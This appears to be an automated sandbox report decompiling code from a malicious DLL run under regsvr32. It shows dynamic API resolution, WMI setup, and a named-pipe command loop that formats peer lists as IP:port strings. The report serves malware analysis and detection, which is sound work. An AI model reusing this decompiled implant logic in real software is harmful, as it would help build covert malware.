                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3ef5
                                                                                                                                                                        0x05ba3ef7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3ef7
                                                                                                                                                                        0x05ba3ef3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3eb6
                                                                                                                                                                        0x05ba3d99
                                                                                                                                                                        0x05ba3da7
                                                                                                                                                                        0x05ba3dac
                                                                                                                                                                        0x05ba3db7
                                                                                                                                                                        0x05ba3dba
                                                                                                                                                                        0x05ba3dbe
                                                                                                                                                                        0x05ba3dc0
                                                                                                                                                                        0x05ba3dd0
                                                                                                                                                                        0x05ba3dd9
                                                                                                                                                                        0x05ba3de2
                                                                                                                                                                        0x05ba3dea
                                                                                                                                                                        0x05ba3df3
                                                                                                                                                                        0x05ba3dfe
                                                                                                                                                                        0x05ba3e04
                                                                                                                                                                        0x05ba3e07
                                                                                                                                                                        0x05ba3e0a
                                                                                                                                                                        0x05ba3e11
                                                                                                                                                                        0x05ba3e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba3e23
                                                                                                                                                                        0x05ba3e31
                                                                                                                                                                        0x05ba3e3c
                                                                                                                                                                        0x05ba3e46
                                                                                                                                                                        0x05ba3e5e
                                                                                                                                                                        0x05ba3e6b
                                                                                                                                                                        0x05ba3e6b
                                                                                                                                                                        0x05ba3e48
                                                                                                                                                                        0x05ba3e53
                                                                                                                                                                        0x05ba3e53
                                                                                                                                                                        0x05ba3e72
                                                                                                                                                                        0x05ba3e72
                                                                                                                                                                        0x05ba3e7a
                                                                                                                                                                        0x05ba3e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 05BA3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05BA3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05BA3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05BA3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 05BA4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 75ec2ab1fc016b971d0e33d31b8cfeb280cb37257922d224da30af3a5f0fa846
                                                                                                                                                                        • Instruction ID: 138315b4f1ca1ab1b940ef9cc2deafd5dee983a2a8db1ddbbd6d1915d8b43622
                                                                                                                                                                        • Opcode Fuzzy Hash: 75ec2ab1fc016b971d0e33d31b8cfeb280cb37257922d224da30af3a5f0fa846
                                                                                                                                                                        • Instruction Fuzzy Hash: BDE1A276A18209DFCF24CFA8C581AADBBF1FF08314F1485AAE816EB351D774A941DB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA19A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: 31570e814882396d159f4280f4380ea12fe7f4c4e2b82c04bd1ae1ad075d2b98
                                                                                                                                                                        • Instruction ID: ea4e459880541c5c0e8521380c4f4c5784172dc6f25e87b333f5356cb34cf72d
                                                                                                                                                                        • Opcode Fuzzy Hash: 31570e814882396d159f4280f4380ea12fe7f4c4e2b82c04bd1ae1ad075d2b98
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41493770C305ABDBA88E6CDD8DBBE3A6AEF80250F5400D6F913D6244E361F951D291
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9E400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E05B9E400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x5bac868, 0, 1, 0x5bac878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E05B98BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                        0x05b9e40d
                                                                                                                                                                        0x05b9e410
                                                                                                                                                                        0x05b9e413
                                                                                                                                                                        0x05b9e424
                                                                                                                                                                        0x05b9e42a
                                                                                                                                                                        0x05b9e43b
                                                                                                                                                                        0x05b9e443
                                                                                                                                                                        0x05b9e494
                                                                                                                                                                        0x05b9e494
                                                                                                                                                                        0x05b9e499
                                                                                                                                                                        0x05b9e49e
                                                                                                                                                                        0x05b9e49e
                                                                                                                                                                        0x05b9e4a1
                                                                                                                                                                        0x05b9e4a6
                                                                                                                                                                        0x05b9e4ab
                                                                                                                                                                        0x05b9e4ab
                                                                                                                                                                        0x05b9e4ae
                                                                                                                                                                        0x05b9e445
                                                                                                                                                                        0x05b9e446
                                                                                                                                                                        0x05b9e44c
                                                                                                                                                                        0x05b9e45d
                                                                                                                                                                        0x05b9e462
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9e464
                                                                                                                                                                        0x05b9e471
                                                                                                                                                                        0x05b9e479
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9e47b
                                                                                                                                                                        0x05b9e47d
                                                                                                                                                                        0x05b9e485
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9e487
                                                                                                                                                                        0x05b9e48a
                                                                                                                                                                        0x05b9e490
                                                                                                                                                                        0x05b9e490
                                                                                                                                                                        0x05b9e485
                                                                                                                                                                        0x05b9e479
                                                                                                                                                                        0x05b9e462
                                                                                                                                                                        0x05b9e4b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E424
                                                                                                                                                                        • CoCreateInstance.OLE32(05BAC868,00000000,00000001,05BAC878,?,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E471
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 83ca1daa55dfd560f23600843320c33468aa34dae47285a0d47517f2e41550ff
                                                                                                                                                                        • Instruction ID: 0265535d101e0eeb3611de91f1f84e73666b52076986f8472b9903a8faeb9c90
                                                                                                                                                                        • Opcode Fuzzy Hash: 83ca1daa55dfd560f23600843320c33468aa34dae47285a0d47517f2e41550ff
                                                                                                                                                                        • Instruction Fuzzy Hash: E821D870614245BBDB288B66DC4EE6FBFBCEFC6F15B1041ACB505A6291DA70EA00D660
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05BA3379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E05BA3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L05BA34D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E05BA3352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E05B98CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x5ba1b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                        0x05ba3379
                                                                                                                                                                        0x05ba337c
                                                                                                                                                                        0x05ba3381
                                                                                                                                                                        0x05ba3385
                                                                                                                                                                        0x05ba3385
                                                                                                                                                                        0x05ba338b
                                                                                                                                                                        0x05ba338f
                                                                                                                                                                        0x05ba3390
                                                                                                                                                                        0x05ba3393
                                                                                                                                                                        0x05ba3394
                                                                                                                                                                        0x05ba3399
                                                                                                                                                                        0x05ba339c
                                                                                                                                                                        0x05ba339d
                                                                                                                                                                        0x05ba33a2
                                                                                                                                                                        0x05ba33a9
                                                                                                                                                                        0x05ba3432
                                                                                                                                                                        0x05ba3432
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba33b4
                                                                                                                                                                        0x05ba33b5
                                                                                                                                                                        0x05ba33c7
                                                                                                                                                                        0x05ba33ed
                                                                                                                                                                        0x05ba33ed
                                                                                                                                                                        0x05ba33f6
                                                                                                                                                                        0x05ba33f8
                                                                                                                                                                        0x05ba33fe
                                                                                                                                                                        0x05ba342d
                                                                                                                                                                        0x05ba342d
                                                                                                                                                                        0x05ba3435
                                                                                                                                                                        0x05ba3438
                                                                                                                                                                        0x05ba3438
                                                                                                                                                                        0x05ba3400
                                                                                                                                                                        0x05ba3401
                                                                                                                                                                        0x05ba3407
                                                                                                                                                                        0x05ba3409
                                                                                                                                                                        0x05ba3409
                                                                                                                                                                        0x05ba340e
                                                                                                                                                                        0x05ba340d
                                                                                                                                                                        0x05ba340d
                                                                                                                                                                        0x05ba3415
                                                                                                                                                                        0x05ba3421
                                                                                                                                                                        0x05ba342b
                                                                                                                                                                        0x05ba342b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba33d7
                                                                                                                                                                        0x05ba33d7
                                                                                                                                                                        0x05ba33d7
                                                                                                                                                                        0x05ba33dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba33df
                                                                                                                                                                        0x05ba33e5
                                                                                                                                                                        0x05ba33ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba33ea
                                                                                                                                                                        0x05ba33c7

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: 8c3b5e541e0e9e3bf6e3d70f04abde8ddfae1482f3f63c471fc0371ebc7f1879
                                                                                                                                                                        • Instruction ID: dd7a4492efeac0ab349195797f8547befa7ec737c6910e8c19bd68a1367f5c75
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3b5e541e0e9e3bf6e3d70f04abde8ddfae1482f3f63c471fc0371ebc7f1879
                                                                                                                                                                        • Instruction Fuzzy Hash: 7721356374CB143ADB228A28EC85FAE3BC8EF02660F1848E5F9509A180EA61B9404390
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E05B9377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x5baf818; // 0x5d5f8b0
					_push(0);
					_push( *0x5baf804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x5baf818; // 0x5d5f8b0
					_push(0x80000);
					_push( *0x5baf8bc);
					_push( *0x5baf804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x5baf8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E05BA0962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E05B9D1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x5baf804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E05B9171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E05B98BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E05B9D1A6(_t188);
									L52:
									E05B98BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E05B9A43D(_t203));
									_push(_t203);
									_t189 = 5;
									E05B9D1A6(_t189);
									E05B98BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E05B9A43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E05B9A43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E05B9A43D(_t203) + _t203;
										__eflags = _t110;
										E05B99E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E05B9171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E05B98BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E05BA0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E05B99B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x5baf8bc; // 0x0
								E05B99EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E05B91DD3(E05B99F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E05B98BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E05B91DD3(E05B99F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E05B99C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E05B99880( *((intOrPtr*)(_t200 + _t148 * 4)), E05B9A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E05B95EC3(E05B9D1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E05BA0940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E05BA0940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                        0x05b9377f
                                                                                                                                                                        0x05b93785
                                                                                                                                                                        0x05b93790
                                                                                                                                                                        0x05b93794
                                                                                                                                                                        0x05b93798
                                                                                                                                                                        0x05b93798
                                                                                                                                                                        0x05b9379d
                                                                                                                                                                        0x05b9379e
                                                                                                                                                                        0x05b937a4
                                                                                                                                                                        0x05b937b0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b937c3
                                                                                                                                                                        0x05b937c8
                                                                                                                                                                        0x05b937c9
                                                                                                                                                                        0x05b937ce
                                                                                                                                                                        0x05b937d3
                                                                                                                                                                        0x05b937d9
                                                                                                                                                                        0x05b937e7
                                                                                                                                                                        0x05b93af7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b937f8
                                                                                                                                                                        0x05b937f8
                                                                                                                                                                        0x05b937fe
                                                                                                                                                                        0x05b93801
                                                                                                                                                                        0x05b93804
                                                                                                                                                                        0x05b93976
                                                                                                                                                                        0x05b93976
                                                                                                                                                                        0x05b93979
                                                                                                                                                                        0x05b93aed
                                                                                                                                                                        0x05b93833
                                                                                                                                                                        0x05b93834
                                                                                                                                                                        0x05b93838
                                                                                                                                                                        0x05b93838
                                                                                                                                                                        0x05b9383a
                                                                                                                                                                        0x05b9383a
                                                                                                                                                                        0x05b9383b
                                                                                                                                                                        0x05b9395a
                                                                                                                                                                        0x05b9395a
                                                                                                                                                                        0x05b9395b
                                                                                                                                                                        0x05b93960
                                                                                                                                                                        0x05b93afd
                                                                                                                                                                        0x05b93b03
                                                                                                                                                                        0x05b93b0e
                                                                                                                                                                        0x05b93b10
                                                                                                                                                                        0x05b93b11
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93b11
                                                                                                                                                                        0x05b93980
                                                                                                                                                                        0x05b93980
                                                                                                                                                                        0x05b93983
                                                                                                                                                                        0x05b939c8
                                                                                                                                                                        0x05b939cc
                                                                                                                                                                        0x05b939d1
                                                                                                                                                                        0x05b939d5
                                                                                                                                                                        0x05b939d7
                                                                                                                                                                        0x05b93ad8
                                                                                                                                                                        0x05b93ade
                                                                                                                                                                        0x05b93ae2
                                                                                                                                                                        0x05b93859
                                                                                                                                                                        0x05b93859
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93859
                                                                                                                                                                        0x05b939dd
                                                                                                                                                                        0x05b939e1
                                                                                                                                                                        0x05b939e5
                                                                                                                                                                        0x05b939ee
                                                                                                                                                                        0x05b939f0
                                                                                                                                                                        0x05b939f5
                                                                                                                                                                        0x05b939f7
                                                                                                                                                                        0x05b93ab2
                                                                                                                                                                        0x05b93ab2
                                                                                                                                                                        0x05b93ab2
                                                                                                                                                                        0x05b93abb
                                                                                                                                                                        0x05b93abd
                                                                                                                                                                        0x05b93ac0
                                                                                                                                                                        0x05b93ac1
                                                                                                                                                                        0x05b93ac8
                                                                                                                                                                        0x05b93ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93ace
                                                                                                                                                                        0x05b939fd
                                                                                                                                                                        0x05b939ff
                                                                                                                                                                        0x05b93a01
                                                                                                                                                                        0x05b93a90
                                                                                                                                                                        0x05b93a97
                                                                                                                                                                        0x05b93a98
                                                                                                                                                                        0x05b93a9b
                                                                                                                                                                        0x05b93a9c
                                                                                                                                                                        0x05b93aa8
                                                                                                                                                                        0x05b93aad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93aad
                                                                                                                                                                        0x05b93a0b
                                                                                                                                                                        0x05b93a0b
                                                                                                                                                                        0x05b93a0e
                                                                                                                                                                        0x05b93a12
                                                                                                                                                                        0x05b93a12
                                                                                                                                                                        0x05b93a14
                                                                                                                                                                        0x05b93a19
                                                                                                                                                                        0x05b93a1b
                                                                                                                                                                        0x05b93a1e
                                                                                                                                                                        0x05b93a24
                                                                                                                                                                        0x05b93a28
                                                                                                                                                                        0x05b93a28
                                                                                                                                                                        0x05b93a1b
                                                                                                                                                                        0x05b93a2e
                                                                                                                                                                        0x05b93a30
                                                                                                                                                                        0x05b93a34
                                                                                                                                                                        0x05b93a36
                                                                                                                                                                        0x05b93a39
                                                                                                                                                                        0x05b93a40
                                                                                                                                                                        0x05b93a49
                                                                                                                                                                        0x05b93a4f
                                                                                                                                                                        0x05b93a54
                                                                                                                                                                        0x05b93a5d
                                                                                                                                                                        0x05b93a75
                                                                                                                                                                        0x05b93a75
                                                                                                                                                                        0x05b93a78
                                                                                                                                                                        0x05b93a7d
                                                                                                                                                                        0x05b93a81
                                                                                                                                                                        0x05b93a81
                                                                                                                                                                        0x05b93a84
                                                                                                                                                                        0x05b93a85
                                                                                                                                                                        0x05b93a88
                                                                                                                                                                        0x05b93a8c
                                                                                                                                                                        0x05b93a8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93a12
                                                                                                                                                                        0x05b93985
                                                                                                                                                                        0x05b93988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93992
                                                                                                                                                                        0x05b93996
                                                                                                                                                                        0x05b9399b
                                                                                                                                                                        0x05b9399f
                                                                                                                                                                        0x05b939a3
                                                                                                                                                                        0x05b939a5
                                                                                                                                                                        0x05b939ad
                                                                                                                                                                        0x05b939b3
                                                                                                                                                                        0x05b939b7
                                                                                                                                                                        0x05b939bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b939bb
                                                                                                                                                                        0x05b9380a
                                                                                                                                                                        0x05b9396c
                                                                                                                                                                        0x05b9384c
                                                                                                                                                                        0x05b9384d
                                                                                                                                                                        0x05b9384f
                                                                                                                                                                        0x05b93857
                                                                                                                                                                        0x05b93858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93858
                                                                                                                                                                        0x05b93851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93851
                                                                                                                                                                        0x05b93810
                                                                                                                                                                        0x05b93813
                                                                                                                                                                        0x05b9388f
                                                                                                                                                                        0x05b93891
                                                                                                                                                                        0x05b93897
                                                                                                                                                                        0x05b93899
                                                                                                                                                                        0x05b93936
                                                                                                                                                                        0x05b93936
                                                                                                                                                                        0x05b93948
                                                                                                                                                                        0x05b9394e
                                                                                                                                                                        0x05b93957
                                                                                                                                                                        0x05b93958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93958
                                                                                                                                                                        0x05b9389f
                                                                                                                                                                        0x05b938a3
                                                                                                                                                                        0x05b938a6
                                                                                                                                                                        0x05b9392a
                                                                                                                                                                        0x05b9392f
                                                                                                                                                                        0x05b93932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93932
                                                                                                                                                                        0x05b938a8
                                                                                                                                                                        0x05b938ab
                                                                                                                                                                        0x05b938b3
                                                                                                                                                                        0x05b938b8
                                                                                                                                                                        0x05b938bd
                                                                                                                                                                        0x05b938bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b938c3
                                                                                                                                                                        0x05b938c4
                                                                                                                                                                        0x05b938c6
                                                                                                                                                                        0x05b938f5
                                                                                                                                                                        0x05b93904
                                                                                                                                                                        0x05b93909
                                                                                                                                                                        0x05b9390c
                                                                                                                                                                        0x05b93918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b93918
                                                                                                                                                                        0x05b938c8
                                                                                                                                                                        0x05b938cc
                                                                                                                                                                        0x05b938da
                                                                                                                                                                        0x05b938df
                                                                                                                                                                        0x05b938e3
                                                                                                                                                                        0x05b938e4
                                                                                                                                                                        0x05b938e9
                                                                                                                                                                        0x05b938ed
